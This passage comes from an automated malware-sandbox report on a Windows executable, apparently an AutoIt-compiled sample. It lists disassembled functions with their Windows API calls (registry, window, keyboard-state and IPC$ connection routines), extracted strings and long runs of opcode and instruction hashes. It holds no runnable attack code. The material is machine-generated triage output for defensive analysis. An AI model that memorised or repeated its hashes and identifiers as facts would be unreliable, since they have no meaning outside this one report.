                                                                                                                • Opcode Fuzzy Hash: dd977f09bea9308b610c7238e96fb584538275b520f46e9374bb1ad9d3878166
                                                                                                                • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                                                                                Function 00460ABB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00460CE6
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                                                                • GetParent.USER32(?), ref: 00460D40
                                                                                                                • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                                                • String ID: %s%u
                                                                                                                • API String ID: 1412819556-679674701
                                                                                                                • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                                                • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                                                                                                • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                                                • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                                                                                                Function 00475D8B Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 194COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharDriveLowerType
                                                                                                                • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                                                                • API String ID: 2426244813-4176887700
                                                                                                                • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                                • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                                                                • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                                • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                                                                Function 0046F50B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 157windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                                  • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                                  • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                                  • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                                • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                                                                • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                                                                • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                                                                • ReleaseCapture.USER32 ref: 0046F589
                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                                                                • API String ID: 2483343779-2060113733
                                                                                                                • Opcode ID: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
                                                                                                                • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                                                                • Opcode Fuzzy Hash: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
                                                                                                                • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                                                                Function 0046FD7F Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                                                                • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                                                                • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                                                                • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                                                                • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                • String ID: 2
                                                                                                                • API String ID: 1331449709-450215437
                                                                                                                • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                                                                • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                                                                                Function 004580E1 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 136registryshareCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                                                                • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                • API String ID: 3030280669-22481851
                                                                                                                • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                                                                • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                                                                Function 004584D6 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 105registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                                                                • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen$EnumFromQueryStringValue
                                                                                                                • String ID: ($interface$interface\
                                                                                                                • API String ID: 297354694-3327702407
                                                                                                                • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                                                                • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                                                                Function 0045D83D Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 86COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                                                                • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                                                                • API String ID: 2907320926-41864084
                                                                                                                • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                                                                • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                                                                Function 0043737D Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 83windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(00000000,00007F04), ref: 00437467
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoad
                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                • API String ID: 2457776203-404129466
                                                                                                                • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                                                                • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                                                                Function 0041D221 Relevance: 16.8, APIs: 11, Instructions: 340COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LCMapStringW.KERNEL32(00000000,00000100,004832AC,00000001,00000000,00000000,00000000,00000100,?,?,?,?,?,00000000,00000001,00000000), ref: 0041D253
                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 0041D265
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000100,?,?,?,?,?,00000000,00000001,00000000), ref: 0041D2F1
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,?), ref: 0041D35D
                                                                                                                • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,?), ref: 0041D379
                                                                                                                • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 0041D3B3
                                                                                                                • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 0041D417
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041D43A
                                                                                                                • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,00000000,00000100,?,?,?,?,?), ref: 0041D4CA
                                                                                                                • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,00000100,?,?), ref: 0041D53C
                                                                                                                • LCMapStringA.KERNEL32(?,?,?,?,?,00000100,00000000,00000100,?,?,?,?,?,00000000,00000001,00000000), ref: 0041D589
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1775797328-0
                                                                                                                • Opcode ID: eb41e0d2d1b81e7a32cf906d4b734b1c9ec2c908055d8722ab31c7c9aa7183c2
                                                                                                                • Instruction ID: 1947c5d7a6bd7703781e4ff4e4219a867b2a08f70101b14ec9db93f8b40ae8b3
                                                                                                                • Opcode Fuzzy Hash: eb41e0d2d1b81e7a32cf906d4b734b1c9ec2c908055d8722ab31c7c9aa7183c2
                                                                                                                • Instruction Fuzzy Hash: FFB19AB2C00119BFCF119FA0DC818EF7BB6EB48358B14456BF915A2220D7399DE1DB99
                                                                                                                Function 00467214 Relevance: 16.8, APIs: 11, Instructions: 313COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                                                                • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$Data$AccessUnaccess$Vartype
                                                                                                                • String ID:
                                                                                                                • API String ID: 1349711609-0
                                                                                                                • Opcode ID: 16f99e80be173eecdd1bb573f6b7f825babaa5351af7cc3efc94bb11c862a2f8
                                                                                                                • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                                                                • Opcode Fuzzy Hash: 16f99e80be173eecdd1bb573f6b7f825babaa5351af7cc3efc94bb11c862a2f8
                                                                                                                • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                                                                Function 0046EA7F Relevance: 16.7, APIs: 11, Instructions: 167windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                                                                • DeleteObject.GDI32(00630000), ref: 0046EB4F
                                                                                                                • DestroyIcon.USER32(006C0061), ref: 0046EB67
                                                                                                                • DeleteObject.GDI32(835BD82C), ref: 0046EB7F
                                                                                                                • DestroyWindow.USER32(0041005C), ref: 0046EB97
                                                                                                                • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                                                                • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 802431696-0
                                                                                                                • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                                                                                • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                                                                                                Function 00444D52 Relevance: 16.6, APIs: 11, Instructions: 132keyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                                                                                                                • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                                                                                                                • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                                                                                                                • GetKeyState.USER32(00000011), ref: 00444E77
                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                                                                                                                • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                                                                                                                • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 541375521-0
                                                                                                                • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                                                • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                                                                                                                • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                                                • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                                                                                                                Function 00479921 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 314COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
